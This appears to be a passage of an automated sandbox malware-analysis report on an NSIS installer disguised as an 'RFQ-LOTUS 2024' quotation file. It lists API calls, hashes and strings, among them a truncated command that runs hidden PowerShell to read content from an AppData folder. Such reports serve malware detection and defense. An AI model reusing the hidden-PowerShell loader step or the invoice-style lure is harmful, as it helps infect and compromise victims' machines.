IsWindowEnabled.USER32(00000000), ref: 00403CDE
GetDlgItem.USER32(?,00000001), ref: 00403D8C
GetDlgItem.USER32(?,00000002), ref: 00403D96
SetClassLongW.USER32(?,000000F2,?), ref: 00403DB0
SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403E01
GetDlgItem.USER32(?,00000003), ref: 00403EA7
ShowWindow.USER32(00000000,?), ref: 00403EC8
KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403EDA
EnableWindow.USER32(?,?), ref: 00403EF5
GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403F0B
EnableMenuItem.USER32(00000000), ref: 00403F12
SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00403F2A
SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00403F3D
lstrlenW.KERNEL32(007A1F20,?,007A1F20,007A7A20), ref: 00403F66
SetWindowTextW.USER32(?,007A1F20), ref: 00403F7A
ShowWindow.USER32(?,0000000A), ref: 004040AE

Memory Dump Source

Source File: 00000000.00000002.1722339671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1722255161.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722439170.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.00000000007AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.00000000007B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.00000000007C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1723553830.00000000007C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1723553830.00000000007D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1723553830.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ-LOTUS 2024.jbxd

Similarity

API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
String ID:
API String ID: 3282139019-0
Opcode ID: 185b5e1c0ba25d101467035dcd0349198d1f462ccd0962e07e58b023e6120319
Instruction ID: 7796c2fd8547987e4759cb33fe346f97dbca58780086dd76f853dd754902a95e
Opcode Fuzzy Hash: 185b5e1c0ba25d101467035dcd0349198d1f462ccd0962e07e58b023e6120319
Instruction Fuzzy Hash: 0AC1BFB2504204EFDB206F61EE45E2B7AA8EB86705F00853EF651B11F1CB3D9851DB5E

Uniqueness

Uniqueness Score: -1.00%

Function 00403876 Relevance: 45.7, APIs: 13, Strings: 13, Instructions: 215
stringregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00406407: GetModuleHandleA.KERNEL32(?,00000020,?,004032E6,00000009), ref: 00406419
Part of subcall function 00406407: GetProcAddress.KERNEL32(00000000,?), ref: 00406434

lstrcatW.KERNEL32(1033,007A1F20), ref: 004038F7
lstrlenW.KERNEL32(Execute: ,?,?,?,Execute: ,00000000,C:\Users\user\AppData\Roaming\frikirkernes\tvanmeldelsen\Epostkort,1033,007A1F20,80000001,Control Panel\Desktop\ResourceLocale,00000000,007A1F20,00000000,00000002,74DF3420), ref: 00403977
lstrcmpiW.KERNEL32(?,.exe,Execute: ,?,?,?,Execute: ,00000000,C:\Users\user\AppData\Roaming\frikirkernes\tvanmeldelsen\Epostkort,1033,007A1F20,80000001,Control Panel\Desktop\ResourceLocale,00000000,007A1F20,00000000), ref: 0040398A
GetFileAttributesW.KERNEL32(Execute: ), ref: 00403995
LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\frikirkernes\tvanmeldelsen\Epostkort), ref: 004039DE

Part of subcall function 00405F74: wsprintfW.USER32 ref: 00405F81

RegisterClassW.USER32(007A79C0), ref: 00403A1B
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403A33
CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403A68
ShowWindow.USER32(00000005,00000000), ref: 00403A9E
GetClassInfoW.USER32(00000000,RichEdit20W,007A79C0), ref: 00403ACA
GetClassInfoW.USER32(00000000,RichEdit,007A79C0), ref: 00403AD7
RegisterClassW.USER32(007A79C0), ref: 00403AE0
DialogBoxParamW.USER32(?,00000000,00403C19,00000000), ref: 00403AFF

Strings

RichEd32, xrefs: 00403AB2
Control Panel\Desktop\ResourceLocale, xrefs: 004038AA
C:\Users\user\AppData\Local\Temp\, xrefs: 0040387B
1033, xrefs: 00403896, 004038F2
.exe, xrefs: 00403984
RichEdit20W, xrefs: 00403AC2, 00403AC8
RichEdit, xrefs: 00403AD1
_Nb, xrefs: 004039FA, 00403A62
RichEd20, xrefs: 00403AA4
C:\Users\user\AppData\Roaming\frikirkernes\tvanmeldelsen\Epostkort, xrefs: 00403906, 0040390E, 004039B1, 004039B7, 004039C7
.DEFAULT\Control Panel\International, xrefs: 004038E2
"C:\Users\user\Desktop\RFQ-LOTUS 2024.exe", xrefs: 0040387A
Execute: , xrefs: 0040393E, 00403947, 00403955, 004039A4, 004039AA

Memory Dump Source

Source File: 00000000.00000002.1722339671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1722255161.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722439170.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.00000000007AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.00000000007B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.00000000007C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1723553830.00000000007C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1723553830.00000000007D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1723553830.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ-LOTUS 2024.jbxd

Similarity

API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
String ID: "C:\Users\user\Desktop\RFQ-LOTUS 2024.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\frikirkernes\tvanmeldelsen\Epostkort$Control Panel\Desktop\ResourceLocale$Execute: $RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
API String ID: 1975747703-4127016802
Opcode ID: 2aad4ae8f770a3a4c9c0d4813db5772816ca658ce53dfce8c4cc6a4aea9b68c7
Instruction ID: 266f42dc912ac30c3170d4d572d87253d856dcd8cbc4d1b533e3310f3344062b
Opcode Fuzzy Hash: 2aad4ae8f770a3a4c9c0d4813db5772816ca658ce53dfce8c4cc6a4aea9b68c7
Instruction Fuzzy Hash: DA61A270200600AED620AF669D45F2B3A6CEBC5B49F40853FF941B62E2DB7D5901CB6D

Uniqueness

Uniqueness Score: -1.00%

Function 00402DEE Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 182
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00402DFF
GetModuleFileNameW.KERNEL32(00000000,007B6800,00000400,?,?,"C:\Users\user\Desktop\RFQ-LOTUS 2024.exe",00403513,?), ref: 00402E1B

Part of subcall function 00405C02: GetFileAttributesW.KERNELBASE(00000003,00402E2E,007B6800,80000000,00000003,?,?,"C:\Users\user\Desktop\RFQ-LOTUS 2024.exe",00403513,?), ref: 00405C06
Part of subcall function 00405C02: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,"C:\Users\user\Desktop\RFQ-LOTUS 2024.exe",00403513,?), ref: 00405C28

GetFileSize.KERNEL32(00000000,00000000,007B7000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,007B6800,007B6800,80000000,00000003,?,?,"C:\Users\user\Desktop\RFQ-LOTUS 2024.exe",00403513,?), ref: 00402E67

Strings

Inst, xrefs: 00402ED3
Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00402FC6
soft, xrefs: 00402EDC
Error launching installer, xrefs: 00402E3E
C:\Users\user\AppData\Local\Temp\, xrefs: 00402DF5
Null, xrefs: 00402EE5
vy, xrefs: 00402E7C
C:\Users\user\Desktop, xrefs: 00402E49, 00402E4E, 00402E54
"C:\Users\user\Desktop\RFQ-LOTUS 2024.exe", xrefs: 00402DEE

Memory Dump Source

Source File: 00000000.00000002.1722339671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1722255161.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722439170.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.00000000007AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.00000000007B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.00000000007C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1723553830.00000000007C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1723553830.00000000007D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1723553830.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ-LOTUS 2024.jbxd

Similarity

API ID: File$AttributesCountCreateModuleNameSizeTick
String ID: "C:\Users\user\Desktop\RFQ-LOTUS 2024.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft$vy
API String ID: 4283519449-412815199
Opcode ID: 2230abfe47367ce911a851d27291f94f72d64689ba699b53d3264e4bd5f6c4f0
Instruction ID: 09a089d5f82a6c40e132a302aa9c698f597429127be3c6a0c4abd29db18ff3c5
Opcode Fuzzy Hash: 2230abfe47367ce911a851d27291f94f72d64689ba699b53d3264e4bd5f6c4f0
Instruction Fuzzy Hash: CE51E971901206ABDB109F64DE89B5E7BB8EF15394F20403BF904B62D1DBBC4D409B5D

Uniqueness

Uniqueness Score: -1.00%

Function 0040518C Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72
stringwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlenW.KERNEL32(Execute: "powershell.exe" -windowstyle hidden "$Stabejsernes=Get-Content 'C:\Users\user\AppData\Roaming\frikirkernes\tvanmeldelse,00000000,00795528,74DF23A0,?,?,?,?,?,?,?,?,?,00403168,00000000,?), ref: 004051C4
lstrlenW.KERNEL32(00403168,Execute: "powershell.exe" -windowstyle hidden "$Stabejsernes=Get-Content 'C:\Users\user\AppData\Roaming\frikirkernes\tvanmeldelse,00000000,00795528,74DF23A0,?,?,?,?,?,?,?,?,?,00403168,00000000), ref: 004051D4
lstrcatW.KERNEL32(Execute: "powershell.exe" -windowstyle hidden "$Stabejsernes=Get-Content 'C:\Users\user\AppData\Roaming\frikirkernes\tvanmeldelse,00403168), ref: 004051E7
SetWindowTextW.USER32(Execute: "powershell.exe" -windowstyle hidden "$Stabejsernes=Get-Content 'C:\Users\user\AppData\Roaming\frikirkernes\tvanmeldelse,Execute: "powershell.exe" -windowstyle hidden "$Stabejsernes=Get-Content 'C:\Users\user\AppData\Roaming\frikirkernes\tvanmeldelse), ref: 004051F9
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040521F
SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405239
SendMessageW.USER32(?,00001013,?,00000000), ref: 00405247

Strings

Execute: "powershell.exe" -windowstyle hidden "$Stabejsernes=Get-Content 'C:\Users\user\AppData\Roaming\frikirkernes\tvanmeldelse, xrefs: 004051AD, 004051BD, 004051C3, 004051E6, 004051F2

Memory Dump Source

Source File: 00000000.00000002.1722339671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1722255161.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722439170.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.00000000007AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.00000000007B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.00000000007C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1723553830.00000000007C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1723553830.00000000007D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1723553830.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ-LOTUS 2024.jbxd

Similarity

API ID: MessageSend$lstrlen$TextWindowlstrcat
String ID: Execute: "powershell.exe" -windowstyle hidden "$Stabejsernes=Get-Content 'C:\Users\user\AppData\Roaming\frikirkernes\tvanmeldelse
API String ID: 2531174081-816595982
Opcode ID: baa22e3bb1d4b1fe90a2dc8523cea4daa0ee706f4726e05986a8d1993b39331c
Instruction ID: ba1fee82cce58728351fc00c71800df183ba28672b3cc7c2ac0788bec40afb87
Opcode Fuzzy Hash: baa22e3bb1d4b1fe90a2dc8523cea4daa0ee706f4726e05986a8d1993b39331c
Instruction Fuzzy Hash: F721AF71900558BACB119FA6DD44ACFBFB8EF85310F10807AF904B62A1C7794A40CFA8

Uniqueness

Uniqueness Score: -1.00%

Function 00403027 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 161
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00403091
GetTickCount.KERNEL32 ref: 00403115
MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 0040313E
wsprintfW.USER32 ref: 00403151

Strings

Mx, xrefs: 004030DB, 004030ED
(Uy, xrefs: 004030F2, 0040310D, 0040318A
... %d%%, xrefs: 0040314B

Memory Dump Source

Source File: 00000000.00000002.1722339671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1722255161.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722439170.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.00000000007AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.00000000007B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.00000000007C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1723553830.00000000007C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1723553830.00000000007D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1723553830.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ-LOTUS 2024.jbxd

Similarity

API ID: CountTick$wsprintf
String ID: (Uy$... %d%%$Mx
API String ID: 551687249-1559738935
Opcode ID: 64e3684ffa8c04dbafb980c2e948ff94a517c572883cec4c9b5d615e314ee73f
Instruction ID: 45afdf0c92a303c1fb6294b6805c2526d8a52aadf0d65962a881b974f50d995b
Opcode Fuzzy Hash: 64e3684ffa8c04dbafb980c2e948ff94a517c572883cec4c9b5d615e314ee73f
Instruction Fuzzy Hash: AA518C31801209EBCB10CFA5DA44B9F7BB8AF55766F1441BBE814B72C1D7788F508BA9

Uniqueness

Uniqueness Score: -1.00%

Function 00406397 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004063AE
wsprintfW.USER32 ref: 004063E9
LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 004063FD

Strings

%s%S.dll, xrefs: 004063E3
\, xrefs: 004063BF
UXTHEME, xrefs: 004063A0

Memory Dump Source

Source File: 00000000.00000002.1722339671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1722255161.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722439170.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.00000000007AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.00000000007B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.00000000007C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1723553830.00000000007C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1723553830.00000000007D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1723553830.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ-LOTUS 2024.jbxd

Similarity

API ID: DirectoryLibraryLoadSystemwsprintf
String ID: %s%S.dll$UXTHEME$\
API String ID: 2200240437-1946221925
Opcode ID: 9cd176900e46196ffcfca9c6351026e8055dbc09b9427d0f5483d49a535bfda6
Instruction ID: c9fa99885ad6dc82947e8769e1e813740631d6316ec4b329aa07ca863a8e6543
Opcode Fuzzy Hash: 9cd176900e46196ffcfca9c6351026e8055dbc09b9427d0f5483d49a535bfda6
Instruction Fuzzy Hash: 6BF0F670510219A7DB10AB64DD0DF9A366CAB00304F10443ABA46F20E0EFB8DA79CBE8

Uniqueness

Uniqueness Score: -1.00%

Function 00405C31 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 37
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00405C4F
GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,"C:\Users\user\Desktop\RFQ-LOTUS 2024.exe",0040327B,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034A5), ref: 00405C6A

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405C36
nsa, xrefs: 00405C3E
"C:\Users\user\Desktop\RFQ-LOTUS 2024.exe", xrefs: 00405C31

Memory Dump Source

Source File: 00000000.00000002.1722339671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1722255161.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722439170.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.00000000007AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.00000000007B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.00000000007C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1723553830.00000000007C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1723553830.00000000007D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1723553830.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ-LOTUS 2024.jbxd

Similarity

API ID: CountFileNameTempTick
String ID: "C:\Users\user\Desktop\RFQ-LOTUS 2024.exe"$C:\Users\user\AppData\Local\Temp\$nsa
API String ID: 1716503409-3917272646
Opcode ID: da3add3990966c57ea49aa46ced784fea404a948837784a5301244cb17f573d8
Instruction ID: eddd0f9b3fe3e6878938fd53c549b869409703644024dbd16f9d2af4fdafb47c
Opcode Fuzzy Hash: da3add3990966c57ea49aa46ced784fea404a948837784a5301244cb17f573d8
Instruction Fuzzy Hash: D7F09076700708BFEB109F59DD05A9BB7BCEB91710F10403AFD01E7280E6B09E548B68

Uniqueness

Uniqueness Score: -1.00%

Function 0040570D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,007A4F28,Error launching installer), ref: 00405736
CloseHandle.KERNEL32(?), ref: 00405743

Strings

Error launching installer, xrefs: 00405720

Memory Dump Source

Source File: 00000000.00000002.1722339671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1722255161.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722439170.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.00000000007AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.00000000007B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1722473207.00000000007C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1723553830.00000000007C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1723553830.00000000007D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1723553830.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ-LOTUS 2024.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID: Error launching installer
API String ID: 3712363035-66219284
Opcode ID: 7e68a0d0a0c67d6b79c3ee887bc9c02d6c3d323b7ac9ccfb382382dd5f261eaf
Instruction ID: 36cb6700757ba35c499a420c30df9f69cdbb022eeaef0abc6502029d7df0636c
Opcode Fuzzy Hash: 7e68a0d0a0c67d6b79c3ee887bc9c02d6c3d323b7ac9ccfb382382dd5f261eaf
Instruction Fuzzy Hash: 2DE0B6F4600209BFEB10AB64ED49E7B7AACEB48605F018525BD50F2190D7B998148A78

Uniqueness

Uniqueness Score: -1.00%

Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4

Memory Dump Source

